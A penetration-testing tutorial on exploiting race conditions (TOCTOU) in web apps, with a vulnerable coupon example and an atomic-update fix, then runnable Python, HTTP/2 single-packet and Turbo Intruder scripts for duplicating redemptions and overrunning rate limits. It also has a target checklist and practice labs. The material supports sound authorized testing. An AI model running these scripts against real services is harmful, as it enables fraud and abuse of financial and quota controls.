Race Condition Exploitation
Race conditions occur when application behavior depends on the timing of events, allowing attackers to exploit the gap between checking a condition and using the result. These vulnerabilities can bypass security controls, duplicate transactions, or exceed rate limits.
Quick Navigation
Fundamentals
Attack Techniques
- Limit Overrun Attacks
- Single-Packet Attacks
- Turbo Intruder
Automation
Practice
- Practice Labs
- Testing Checklist
Understanding Race Conditions
A race condition exists when the correct behavior of a system depends on the sequence or timing of uncontrollable events. In web applications, this typically occurs when:
- Multiple requests modify shared state without proper locking
- A check and subsequent action aren't atomic operations
- Database transactions lack appropriate isolation levels
- Caching layers introduce timing inconsistencies
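The check-then-act gap described above can be made concrete in a few lines of Python. This is an illustrative toy, not an attack: the sleep is an artificial race window standing in for a database round-trip, and all names are invented for the demo.

```python
import threading
import time

class CouponStore:
    """Toy shared state with a non-atomic check-then-act sequence."""
    def __init__(self):
        self.used = False
        self.redemptions = 0

    def redeem(self):
        # CHECK: read shared state
        if self.used:
            return
        time.sleep(0.05)  # race window (simulates a DB round-trip)
        # USE: act on the now-stale check
        self.redemptions += 1
        self.used = True

store = CouponStore()
threads = [threading.Thread(target=store.redeem) for _ in range(5)]
for t in threads:
    t.start()
for t in threads:
    t.join()

# Every thread passed the check before any of them set `used`
print(store.redemptions)
```

All five threads observe `used == False` before any of them finishes the sleep, so the coupon is "redeemed" five times; with a lock around the whole check-and-update, the count would be one.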
Common Race Condition Scenarios
Financial Operations
Transfer funds, redeem coupons, or claim rewards multiple times by sending concurrent requests
Inventory/Quota
Book the same seat, purchase limited items, or exceed API rate limits
Authentication
Bypass brute-force protections, reuse one-time tokens, or exploit session state
File Operations
Exploit file write/read sequences, symlink attacks, or temp file vulnerabilities
Time-of-Check to Time-of-Use (TOCTOU)
TOCTOU is a specific race condition where a resource is checked for a condition, then used based on that check, but the resource's state changes between the check and use.
# TOCTOU Example: Coupon Redemption
# Vulnerable pseudo-code
def redeem_coupon(user_id, coupon_code):
    # CHECK: Is coupon still valid?
    coupon = db.query("SELECT * FROM coupons WHERE code = ?", coupon_code)
    if coupon.used:
        return "Coupon already used"
    if coupon.expired:
        return "Coupon expired"
    # RACE WINDOW: Another request could redeem between check and use
    # USE: Apply discount and mark as used
    apply_discount(user_id, coupon.value)
    db.execute("UPDATE coupons SET used = 1 WHERE code = ?", coupon_code)
    return "Coupon redeemed successfully"

# Attack: Send 10 concurrent requests with same coupon
# Result: Multiple requests pass the check before any marks it used
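The fix is to collapse the check and the update into one atomic operation. A minimal sketch, using SQLite purely for demonstration (any database with atomic conditional UPDATEs works the same way; the schema and function name are invented for this example):

```python
import sqlite3

def redeem_coupon_atomic(db, coupon_code):
    # CHECK and USE in a single statement: the WHERE clause rejects
    # already-used coupons, so only one concurrent request can match
    cur = db.execute(
        "UPDATE coupons SET used = 1 WHERE code = ? AND used = 0",
        (coupon_code,),
    )
    db.commit()
    if cur.rowcount == 0:
        return "Coupon already used or invalid"
    return "Coupon redeemed successfully"

# Demo: however requests interleave, only the first redemption succeeds
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE coupons (code TEXT PRIMARY KEY, used INTEGER)")
db.execute("INSERT INTO coupons VALUES ('DISCOUNT50', 0)")
results = [redeem_coupon_atomic(db, "DISCOUNT50") for _ in range(5)]
print(results.count("Coupon redeemed successfully"))  # prints 1
```

The race window disappears because the database evaluates `used = 0` and sets `used = 1` atomically; checking `rowcount` tells the application whether it won.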
Detection Techniques
Look for these indicators when hunting for race conditions:
# Indicators of potential race conditions:
1. State-changing operations without transactions:
- /api/transfer - Money transfers
- /api/redeem - Coupon/gift card redemption
- /api/vote - Voting systems
- /api/like - Social media interactions
2. Rate-limited endpoints:
- /api/generate - AI/content generation
- /api/export - Data exports
- /api/search - Search APIs
3. One-time-use tokens:
- /reset-password?token=xxx
- /verify-email?code=xxx
- /invite/accept?token=xxx
4. Inventory operations:
- /api/cart/checkout
- /api/booking/reserve
- /api/tickets/purchase
# Testing approach:
1. Identify state-changing endpoint
2. Capture the request in Burp
3. Send 10-50 concurrent requests using Turbo Intruder
4. Check if multiple succeeded when only one should have
Limit Overrun Attacks
Limit overrun exploits the gap between checking a limit and updating the counter. If requests arrive simultaneously, multiple may pass the check before the limit is decremented.
# Limit Overrun Race Condition
# Exploit insufficient locking on rate limits or quotas

# Scenario: API allows 5 free requests per day
# Attack: Send 10+ requests simultaneously before limit is checked/updated
import threading
import requests

results = []
lock = threading.Lock()

def make_request(i):
    r = requests.post("http://target.com/api/generate",
                      json={"prompt": "test"})
    remaining = r.json().get('remaining', 'N/A')
    with lock:
        results.append((i, r.status_code, remaining))
    print(f"Request {i}: {r.status_code} - Remaining: {remaining}")

# Launch 10 threads simultaneously
threads = []
for i in range(10):
    t = threading.Thread(target=make_request, args=(i,))
    threads.append(t)

# Start all threads at once
for t in threads:
    t.start()

# Wait for completion
for t in threads:
    t.join()

# Check results - if more than 5 succeeded, race condition exists
successes = len([r for r in results if r[1] == 200])
print(f"\n[*] {successes} requests succeeded (limit was 5)")
Single-Packet Attacks (HTTP/2)
HTTP/2 multiplexing allows multiple requests over a single connection. By carefully crafting packets, all requests can arrive at the server in a single TCP packet, achieving true simultaneous processing.
# Single-packet attack using HTTP/2
# All requests arrive simultaneously on the wire
import h2.connection
import h2.events
import socket
import ssl

def single_packet_attack(host, requests):
    """
    Send multiple HTTP/2 requests in a single TCP packet
    This achieves true simultaneous arrival at the server
    """
    ctx = ssl.create_default_context()
    ctx.set_alpn_protocols(['h2'])
    sock = socket.create_connection((host, 443))
    sock = ctx.wrap_socket(sock, server_hostname=host)

    conn = h2.connection.H2Connection()
    conn.initiate_connection()
    sock.sendall(conn.data_to_send())

    # Queue all requests without sending
    stream_ids = []
    for req in requests:
        stream_id = conn.get_next_available_stream_id()
        stream_ids.append(stream_id)
        headers = [
            (':method', 'POST'),
            (':path', req['path']),
            (':authority', host),
            (':scheme', 'https'),
            ('content-type', 'application/json'),
        ]
        conn.send_headers(stream_id, headers)
        conn.send_data(stream_id, req['body'].encode(), end_stream=True)

    # Flush all buffered frames in a single write
    # (one TCP packet as long as the total size fits)
    sock.sendall(conn.data_to_send())

    # Collect responses
    responses = {}
    while len(responses) < len(requests):
        data = sock.recv(65535)
        events = conn.receive_data(data)
        for event in events:
            if isinstance(event, h2.events.DataReceived):
                responses[event.stream_id] = event.data
    return responses
Turbo Intruder
Turbo Intruder is a Burp Suite extension designed for high-speed, precisely-timed attacks. It's the go-to tool for race condition testing.
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=30,
                           requestsPerConnection=100,
                           pipeline=False)
    # Send requests in parallel to trigger race condition
    for i in range(30):
        engine.queue(target.req, target.baseInput)

def handleResponse(req, interesting):
    if interesting:
        table.add(req)
Turbo Intruder Tips
- Pipeline mode: Set pipeline=True for HTTP/1.1 pipelining (faster than concurrent connections)
- Connection pooling: Adjust concurrentConnections based on server capacity
- Request timing: Queue requests behind a named gate and release them together with engine.openGate()
- Last-byte sync: Use the race.py template for last-byte synchronization
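For reference, the gate mechanism from the tips above looks roughly like the race.py template shipped with Turbo Intruder: requests are queued behind a named gate, and the engine withholds the last byte of each request until the gate opens, so all of them complete on the wire nearly simultaneously. (This script runs inside Burp's Turbo Intruder environment, not standalone; RequestEngine and table are provided by the extension.)

```python
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=30,
                           requestsPerConnection=100,
                           pipeline=False)
    # Queue 30 copies of the captured request behind gate 'race1';
    # the final byte of each is withheld until the gate opens
    for i in range(30):
        engine.queue(target.req, gate='race1')
    # Release all withheld requests as close to simultaneously as possible
    engine.openGate('race1')
    engine.complete(timeout=60)

def handleResponse(req, interesting):
    table.add(req)
```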
Python Exploitation Scripts
#!/usr/bin/env python3
"""
Race Condition Exploitation Script
Sends concurrent requests to exploit TOCTOU vulnerabilities
"""
import asyncio
import aiohttp
import sys

TARGET = "http://target.com/api/redeem-coupon"
COOKIE = "session=abc123"
PAYLOAD = {"coupon_code": "DISCOUNT50"}

async def send_request(session, request_id):
    """Send a single request"""
    headers = {"Cookie": COOKIE, "Content-Type": "application/json"}
    try:
        async with session.post(TARGET, json=PAYLOAD, headers=headers) as resp:
            status = resp.status
            body = await resp.text()
            if "success" in body.lower() or status == 200:
                print(f"[+] Request {request_id}: SUCCESS - {status}")
                return True
            print(f"[-] Request {request_id}: Failed - {status}")
            return False
    except Exception as e:
        print(f"[!] Request {request_id}: Error - {e}")
        return False

async def race_attack(num_requests=20):
    """Launch concurrent requests"""
    print(f"[*] Launching {num_requests} concurrent requests...")
    connector = aiohttp.TCPConnector(limit=0, force_close=True)
    async with aiohttp.ClientSession(connector=connector) as session:
        # Create all tasks
        tasks = [send_request(session, i) for i in range(num_requests)]
        # Execute all at once
        results = await asyncio.gather(*tasks)
    successes = sum(results)
    print(f"\n[*] Results: {successes}/{num_requests} successful")

if __name__ == "__main__":
    num = int(sys.argv[1]) if len(sys.argv) > 1 else 20
    asyncio.run(race_attack(num))
"""
Race Condition Exploitation Script
Sends concurrent requests to exploit TOCTOU vulnerabilities
"""
import asyncio
import aiohttp
import sys
TARGET = "http://target.com/api/redeem-coupon"
COOKIE = "session=abc123"
PAYLOAD = {"coupon_code": "DISCOUNT50"}
async def send_request(session, request_id):
"""Send a single request"""
headers = {"Cookie": COOKIE, "Content-Type": "application/json"}
try:
async with session.post(TARGET, json=PAYLOAD, headers=headers) as resp:
status = resp.status
body = await resp.text()
if "success" in body.lower() or status == 200:
print(f"[+] Request {request_id}: SUCCESS - {status}")
return True
else:
print(f"[-] Request {request_id}: Failed - {status}")
return False
except Exception as e:
print(f"[!] Request {request_id}: Error - {e}")
return False
async def race_attack(num_requests=20):
"""Launch concurrent requests"""
print(f"[*] Launching {num_requests} concurrent requests...")
connector = aiohttp.TCPConnector(limit=0, force_close=True)
async with aiohttp.ClientSession(connector=connector) as session:
# Create all tasks
tasks = [send_request(session, i) for i in range(num_requests)]
# Execute all at once
results = await asyncio.gather(*tasks)
successes = sum(results)
print(f"\n[*] Results: {successes}/{num_requests} successful")
if __name__ == "__main__":
num = int(sys.argv[1]) if len(sys.argv) > 1 else 20
asyncio.run(race_attack(num))Async Attack Patterns
# Alternative approaches for race condition attacks
# (TARGET and PAYLOAD as defined in the script above)
import requests

# 1. Threading with barrier synchronization
import threading

barrier = threading.Barrier(10)  # Wait for 10 threads

def synchronized_request(i):
    # All threads wait here until 10 are ready
    barrier.wait()
    # Then all fire simultaneously
    requests.post(TARGET, json=PAYLOAD)

# 2. Multiprocessing for CPU-bound scenarios
from multiprocessing import Pool

def attack_request(i):
    return requests.post(TARGET, json=PAYLOAD)

with Pool(20) as p:
    results = p.map(attack_request, range(20))

# 3. Using grequests for gevent-based concurrency
import grequests

reqs = [grequests.post(TARGET, json=PAYLOAD) for _ in range(20)]
responses = grequests.map(reqs)  # All sent ~simultaneously

# 4. httpx for HTTP/2 support
import asyncio
import httpx

async def h2_race():
    async with httpx.AsyncClient(http2=True) as client:
        tasks = [client.post(TARGET, json=PAYLOAD) for _ in range(20)]
        responses = await asyncio.gather(*tasks)
Practice Labs
PortSwigger Race Conditions
Comprehensive labs covering all race condition types
Turbo Intruder Examples
Official scripts including race condition templates
PentesterLab Race Condition
Hands-on exercise for exploiting race conditions
HackerOne Hacktivity
Real-world race condition reports for learning
Testing Checklist
Identify Targets
- Money transfer endpoints
- Coupon/promo code redemption
- Rate-limited APIs
- One-time token endpoints
- Inventory/booking systems
- Vote/like functionality

Test Approach
- Use Turbo Intruder with race.py
- Try HTTP/2 single-packet attacks
- Test with 10, 20, 50 concurrent requests
- Check response differences
- Verify state changes in database
- Test during various server loads

Verify Impact
- Did multiple requests succeed?
- Was the limit exceeded?
- Can you quantify financial impact?
- Is the race reproducible?

Document
- Number of concurrent requests needed
- Success rate of exploitation
- Business impact (financial, data)
- Recommended mitigations